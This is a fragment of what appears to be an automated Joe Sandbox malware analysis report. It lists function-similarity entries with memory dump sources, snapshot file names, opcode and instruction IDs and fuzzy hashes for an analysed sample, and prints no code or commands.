                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    • VirtualAlloc.KERNEL32(?,?,?,?), ref: 04C8ED1F
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.359111117.0000000004C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C80000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_4c80000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AllocVirtual
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 4275171209-0
                                                                                                                                                    • Opcode ID: 8135d50e525c758b7111b17285923d4f1e8af793d522605d4e3b42f3d09aaeae
                                                                                                                                                    • Instruction ID: 39e9063521d21983bb2034515a6141282221fabef0a79a33c7f9f55e21fa6cdb
                                                                                                                                                    • Opcode Fuzzy Hash: 8135d50e525c758b7111b17285923d4f1e8af793d522605d4e3b42f3d09aaeae
                                                                                                                                                    • Instruction Fuzzy Hash: 9D3188B9D012489FCF10CFA9E984AAEFBB1AF49314F24942AE814B7214D735A945CF94
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.356462376.0000000001F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F10000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_1f10000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: 4'p
                                                                                                                                                    • API String ID: 0-481844870
                                                                                                                                                    • Opcode ID: 58e30c8cf465434eacc712934b51fd753cdad7b3ee3ffd24ae61170c78d4a6bd
                                                                                                                                                    • Instruction ID: d952288f12c9635f0177e1280fda6707a56143e8aaa3f486ece4d16bae29e804
                                                                                                                                                    • Opcode Fuzzy Hash: 58e30c8cf465434eacc712934b51fd753cdad7b3ee3ffd24ae61170c78d4a6bd
                                                                                                                                                    • Instruction Fuzzy Hash: 3B317536A00205DFCF199F64D854A5D7BB2FF88320F154169E6069B375CB75DC52CB90
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.356455338.0000000001EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01EF0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_1ef0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: 4'p
                                                                                                                                                    • API String ID: 0-481844870
                                                                                                                                                    • Opcode ID: 9ee1c37ded18301a06794df8e96336eed7c0a6ff943ee64046ddddb5b2bb00a2
                                                                                                                                                    • Instruction ID: d5cd789c1b3e992b9bd43ce21c5c93c002d159ecf11b3e59e186e3911c2d73f2
                                                                                                                                                    • Opcode Fuzzy Hash: 9ee1c37ded18301a06794df8e96336eed7c0a6ff943ee64046ddddb5b2bb00a2
                                                                                                                                                    • Instruction Fuzzy Hash: E131B130B102159FDB19AB688C696BEBBB7AFD9710F04402EE907DB3A5CE744C06C791
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.359045988.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_46a0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: p<p
                                                                                                                                                    • API String ID: 0-2671882351
                                                                                                                                                    • Opcode ID: 9debedfa9c9a1582b31903553008f6b0ca8d5069f64cb206e392c3f8908f86fe
                                                                                                                                                    • Instruction ID: b777c77cd33b5e7b00985906fbba40a581f0113ec704c6b961c8bfd389676026
                                                                                                                                                    • Opcode Fuzzy Hash: 9debedfa9c9a1582b31903553008f6b0ca8d5069f64cb206e392c3f8908f86fe
                                                                                                                                                    • Instruction Fuzzy Hash: AF216DB53045449FCB11CF2AC884AAA7BF6AF9A300F094095FD44CB771DA35EC61DB60
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.359045988.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_46a0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: p<p
                                                                                                                                                    • API String ID: 0-2671882351
                                                                                                                                                    • Opcode ID: 93a6e433bebd5e0149318db0aba7ef031b1741c80fe4279b972299f1b8395993
                                                                                                                                                    • Instruction ID: 9d364673208cbffdc9049de90e4be82fb022377aead648b02db9f6d514f9ddd8
                                                                                                                                                    • Opcode Fuzzy Hash: 93a6e433bebd5e0149318db0aba7ef031b1741c80fe4279b972299f1b8395993
                                                                                                                                                    • Instruction Fuzzy Hash: 5E217CB13006449FCB55DF29C8849AA7BF6AF8A714B054195F815CB3B0DA35EC62DF20
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.356455338.0000000001EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01EF0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_1ef0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: (p
                                                                                                                                                    • API String ID: 0-4175582459
                                                                                                                                                    • Opcode ID: 2870656fa560a0d72ebdc1308e00f20e0b4f49d76f7f274189580044b8bd56a3
                                                                                                                                                    • Instruction ID: 3a4b8089bcbb8a0fa115c40393f87210691b4a19eb3a0f4665bfcf3d64951a40
                                                                                                                                                    • Opcode Fuzzy Hash: 2870656fa560a0d72ebdc1308e00f20e0b4f49d76f7f274189580044b8bd56a3
                                                                                                                                                    • Instruction Fuzzy Hash: E1216072614250AFCB4A8F68D814C5D7FB6EF8A32031A81DAE615CB372C636DC15DB91
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.359245806.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_58b0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: .
                                                                                                                                                    • API String ID: 0-248832578
                                                                                                                                                    • Opcode ID: ba5da42e53508bbeb5bc0b3fdc859f8d3491256b6a3a12423f43536b277f69e3
                                                                                                                                                    • Instruction ID: 8015e021c7087f975160f841be615c6671ec62adc608ad620f25cab56e058ff8
                                                                                                                                                    • Opcode Fuzzy Hash: ba5da42e53508bbeb5bc0b3fdc859f8d3491256b6a3a12423f43536b277f69e3
                                                                                                                                                    • Instruction Fuzzy Hash: 1C011278A00229CFCB69EF58C994ACAB7B1FB48301F0040E9E419A7364DB345E82CF40
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.359045988.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_46a0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: H7>
                                                                                                                                                    • API String ID: 0-3501111541
                                                                                                                                                    • Opcode ID: 80b605044a64b656d5dc04dce8dad720c7542f59d73147708944eb70641bcee6
                                                                                                                                                    • Instruction ID: f3249e1e44242a8be61a89865a39bc8ee8c07aefc5b75f2f60bb43939b231d76
                                                                                                                                                    • Opcode Fuzzy Hash: 80b605044a64b656d5dc04dce8dad720c7542f59d73147708944eb70641bcee6
                                                                                                                                                    • Instruction Fuzzy Hash: 1DF03778A01228DFCB11DF58E894BACB7B1FB45300F0402A9E549A7380D7756E41CF01
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.359045988.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_46a0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: Tep
                                                                                                                                                    • API String ID: 0-914316021
                                                                                                                                                    • Opcode ID: afe0206b9141e829bcd83266f52a5a020cdab52914fa6245e3cce650ac055a2e
                                                                                                                                                    • Instruction ID: c901b98f4ec8ca72f3bfa29de546b096bd2284ec56854a6daef02fee13383313
                                                                                                                                                    • Opcode Fuzzy Hash: afe0206b9141e829bcd83266f52a5a020cdab52914fa6245e3cce650ac055a2e
                                                                                                                                                    • Instruction Fuzzy Hash: 78F0C974A00268CFCB65EF65D85079EB7B2FB98300F1041A9D44A97354DB345E85DF51
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.359045988.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_46a0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: J>
                                                                                                                                                    • API String ID: 0-801517240
                                                                                                                                                    • Opcode ID: fa2e03b3eb33efc44adfddbeec3876d04636b526f98357dee2d6f3858073ac3f
                                                                                                                                                    • Instruction ID: e1e2d4c8436755bad01bbc7df5d8f17159b032c47af23774e026ac92defe804a
                                                                                                                                                    • Opcode Fuzzy Hash: fa2e03b3eb33efc44adfddbeec3876d04636b526f98357dee2d6f3858073ac3f
                                                                                                                                                    • Instruction Fuzzy Hash: BAF06D34E04219CFDB21DF58E884BACB7B2FB48300F0406A8E149A7392E7346D80CF40
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.359045988.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_46a0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: \Q>
                                                                                                                                                    • API String ID: 0-4163272568
                                                                                                                                                    • Opcode ID: 76f91dc60bff2cafb76bfdef600c2ef1da21fbeef0329dd8bcf7b0985154ad4a
                                                                                                                                                    • Instruction ID: 55f0abefc7176868c9680441854a90a226d5c2545b5a319c6f04f77d7734ba4c
                                                                                                                                                    • Opcode Fuzzy Hash: 76f91dc60bff2cafb76bfdef600c2ef1da21fbeef0329dd8bcf7b0985154ad4a
                                                                                                                                                    • Instruction Fuzzy Hash: FAF04934E11118DFDB14DF54E894B8DB7B2FB04304F004195E949A7391DB34AE90CF00
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.359045988.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_46a0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: '
                                                                                                                                                    • API String ID: 0-1997036262
                                                                                                                                                    • Opcode ID: 286dd8f91bacd134d502cce04c3708e0ebc721d0528845d139cfbe04c05b8409
                                                                                                                                                    • Instruction ID: 68b579fe2b87120b1232b67b28b381775c9cfbf8eca06ff2be7d0877603bfc13
                                                                                                                                                    • Opcode Fuzzy Hash: 286dd8f91bacd134d502cce04c3708e0ebc721d0528845d139cfbe04c05b8409
                                                                                                                                                    • Instruction Fuzzy Hash: CAF0D474904A58DBDB20CF559C483DABBB1AB46306F1080E6D04EA2250E7342EA98F12
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.359045988.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_46a0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: 0M>
                                                                                                                                                    • API String ID: 0-1604063329
                                                                                                                                                    • Opcode ID: dcfd500a1e0bfbcf812aaf2d05f3b9c6ca6539ec7bb550440e06bd96aa00af61
                                                                                                                                                    • Instruction ID: 7b8ba76d864503fc989fb1e32b56e9468906ef90e3f54b6ba4cbb57c4e6782dd
                                                                                                                                                    • Opcode Fuzzy Hash: dcfd500a1e0bfbcf812aaf2d05f3b9c6ca6539ec7bb550440e06bd96aa00af61
                                                                                                                                                    • Instruction Fuzzy Hash: F3E07574A1126CCFD7269B64ED5479A77B1FB49700F4002A9944DA72A5DB346E81CF02
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.359045988.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_46a0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: C
                                                                                                                                                    • API String ID: 0-1037565863
                                                                                                                                                    • Opcode ID: 82fb791d87b6839a310e9d46f9c9d1be525c31a7e3ac8248e87a8b01e6da87e1
                                                                                                                                                    • Instruction ID: 5c489fbe9a661eea22b0cafaf73a1914470cffc489f72182288dbfa09b6097d7
                                                                                                                                                    • Opcode Fuzzy Hash: 82fb791d87b6839a310e9d46f9c9d1be525c31a7e3ac8248e87a8b01e6da87e1
                                                                                                                                                    • Instruction Fuzzy Hash: D7E0C2B4904A68CFDB308F10DC883CAB7B1BB0430AF4010E9E10EA2290E3742ED5CE16
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.356455338.0000000001EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01EF0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_1ef0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 47186a290f2258cd090c3f596838fef55f0d835b907d0c19ce1819b56ca2dfd5
                                                                                                                                                    • Instruction ID: 5a52eaad62e1f41f81d9ca939fa841769c0710f56ef3b2490189f509d6dd4e8b
                                                                                                                                                    • Opcode Fuzzy Hash: 47186a290f2258cd090c3f596838fef55f0d835b907d0c19ce1819b56ca2dfd5
                                                                                                                                                    • Instruction Fuzzy Hash: 54121F34A002198FDB14EF68C894B9DBBB2BF89300F5185A8E949AB355DF71ED85CF40
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.359045988.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_46a0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 1d82c0cb55c77ac9d15b61425197084c781ca6269139ebf6f55a3fbed4778acd
                                                                                                                                                    • Instruction ID: 1deb74122fa945f7b905143746b106c6910ef4163151e70a60df0c2bc99cc0cc
                                                                                                                                                    • Opcode Fuzzy Hash: 1d82c0cb55c77ac9d15b61425197084c781ca6269139ebf6f55a3fbed4778acd
                                                                                                                                                    • Instruction Fuzzy Hash: E4917B39B01A049FDB14DFA9D544AADB7F2EF88311F24806AE81597390DB31ED52CF90
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.356207478.00000000001E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001E0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_1e0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 5a75a3056419907b93b2c1dae63140ca310d00cbc1eed06ce4486e892eaef630
                                                                                                                                                    • Instruction ID: 3447c6b624efded3bcff6c302a3469e8fcb91984f6fefc6a269127bcc231fde0
                                                                                                                                                    • Opcode Fuzzy Hash: 5a75a3056419907b93b2c1dae63140ca310d00cbc1eed06ce4486e892eaef630
                                                                                                                                                    • Instruction Fuzzy Hash: 66314B35A006448FC704DF6AC595A9DBBF5FF48310B2584A9E409EB362D731EC02CF90
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.359245806.00000000058B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 058B0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_58b0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: f071ba1dfd5d2de8ba4aa3ed3ce9b4d3eeca6a5a959a4f4cdafefb24bee29648
                                                                                                                                                    • Instruction ID: e6b89b551c4ffd98a71d871152245327e1978c0a477c99e09e5bf5b2dfbaeb62
                                                                                                                                                    • Opcode Fuzzy Hash: f071ba1dfd5d2de8ba4aa3ed3ce9b4d3eeca6a5a959a4f4cdafefb24bee29648
                                                                                                                                                    • Instruction Fuzzy Hash: F7A11274E0524CCFCB15EFA9D5446ADBBB6FB48305F20816AE816AB344C774AE42CF91
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.356455338.0000000001EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01EF0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_1ef0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 042bf53de08e0e625e0364ca2a9e4f484709561cf97642a1ceacff47ae09e613
                                                                                                                                                    • Instruction ID: 87166b190972cfa6e38bee3de90dfad66776ba4fc7b3e8e7a5448e8ad73def68
                                                                                                                                                    • Opcode Fuzzy Hash: 042bf53de08e0e625e0364ca2a9e4f484709561cf97642a1ceacff47ae09e613
                                                                                                                                                    • Instruction Fuzzy Hash: DA916874E05218CFDB14DFA8E9407ADBBF1FB89304F10616AE94AAB295CB355E85CF00
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.356455338.0000000001EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01EF0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_1ef0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: c1a5a3402053f3c858f55608b2e606b41e60a65d3b6a4b6323a15457c15c8f0b
                                                                                                                                                    • Instruction ID: 385eb8879a06b3f99289046e7bc94c2c7b7d3b3b014236c696484c0cc378a298
                                                                                                                                                    • Opcode Fuzzy Hash: c1a5a3402053f3c858f55608b2e606b41e60a65d3b6a4b6323a15457c15c8f0b
                                                                                                                                                    • Instruction Fuzzy Hash: 7791FD71A007049FCB25DF69C844AAEBBF2FF88314F14855DEA4687690EB30E906CF51
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.359045988.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_46a0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 7616cb7ae85a57a8c57f813d664f7dce9db5cc561e465e215f37522aec631cfa
                                                                                                                                                    • Instruction ID: 8e3ce810b51195f4b0de0ddb0cebf76b087467039499c2874b0d4c95278f8eb8
                                                                                                                                                    • Opcode Fuzzy Hash: 7616cb7ae85a57a8c57f813d664f7dce9db5cc561e465e215f37522aec631cfa
                                                                                                                                                    • Instruction Fuzzy Hash: 41811975A00614DFCB29DF68C484A9DBBF5BF88710B15856AE8069B361EB30FD42CF91
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.356455338.0000000001EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01EF0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_1ef0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 1b909398cb9f0163406bd004b1994ce250900c503eeaaa7172f42d990bd6b81f
                                                                                                                                                    • Instruction ID: 2dd4e2e815381347a64c1d3734ef63b71ca0893796050c70844b1380b5c2defe
                                                                                                                                                    • Opcode Fuzzy Hash: 1b909398cb9f0163406bd004b1994ce250900c503eeaaa7172f42d990bd6b81f
                                                                                                                                                    • Instruction Fuzzy Hash: 13713A34E05208CFDB04DFA9E594BEDBBB6FB8A304F14A12DD909AB295DB765941CF00
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.356455338.0000000001EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01EF0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_1ef0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 87cf5a3605224f3f3770a38ff8cde9918feae4d6f7871651c55648be6fdbdd49
                                                                                                                                                    • Instruction ID: 4dbf21a98dccef356d7ee1f0bb57eeb39fa4e23c8bfcf89635de4671934a0058
                                                                                                                                                    • Opcode Fuzzy Hash: 87cf5a3605224f3f3770a38ff8cde9918feae4d6f7871651c55648be6fdbdd49
                                                                                                                                                    • Instruction Fuzzy Hash: 38713B30B10615DFDB15DF68D898A6EBBB6EF89700F148069E906DB3A5CB30DC46CB90
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.356455338.0000000001EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01EF0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_1ef0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 2d9ebcc6fbfe7bb052633273e47f16924799edccf8b676178e779bac0658a3d1
                                                                                                                                                    • Instruction ID: 3c22861c59cf6a5c813c128bcb87264fa9968ef99f8c4db43733f32c6b7af0bf
                                                                                                                                                    • Opcode Fuzzy Hash: 2d9ebcc6fbfe7bb052633273e47f16924799edccf8b676178e779bac0658a3d1
                                                                                                                                                    • Instruction Fuzzy Hash: E1813571E05218CFEB18CFA9E5947ECBBF2FB48304F14A16AD909AB255DB351985CF04
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.359045988.00000000046A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 046A0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_46a0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: c4942738e27fb24eb50c316ce83b4f2c99f305d03537897e570d7cbc7db14152
                                                                                                                                                    • Instruction ID: 59240d7aa1a3e717fe3e3abf38e61fd18df013b9ede12b47d48640ec2680be1f
                                                                                                                                                    • Opcode Fuzzy Hash: c4942738e27fb24eb50c316ce83b4f2c99f305d03537897e570d7cbc7db14152
                                                                                                                                                    • Instruction Fuzzy Hash: 9E413B9AC08AC5BFD7124AF458901E87FA0DB37223F0845E6D7418A2D3F265FF278A15
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.356455338.0000000001EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01EF0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_1ef0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 445f5f1a042e5a92be8cbc68dd06d27b66c72164af63d3e1d15c0684b6de3a12
                                                                                                                                                    • Instruction ID: 3d7c0ab23a086232b24ad4891473069b59b79c65a7165bc149b429841eb9e30b
                                                                                                                                                    • Opcode Fuzzy Hash: 445f5f1a042e5a92be8cbc68dd06d27b66c72164af63d3e1d15c0684b6de3a12
                                                                                                                                                    • Instruction Fuzzy Hash: 5D611835B10615DFDB14DF68D898A6DBBB6FF88710F1481A9E9069B3A5CB30EC41CB90
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.356462376.0000000001F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F10000, based on PE: false
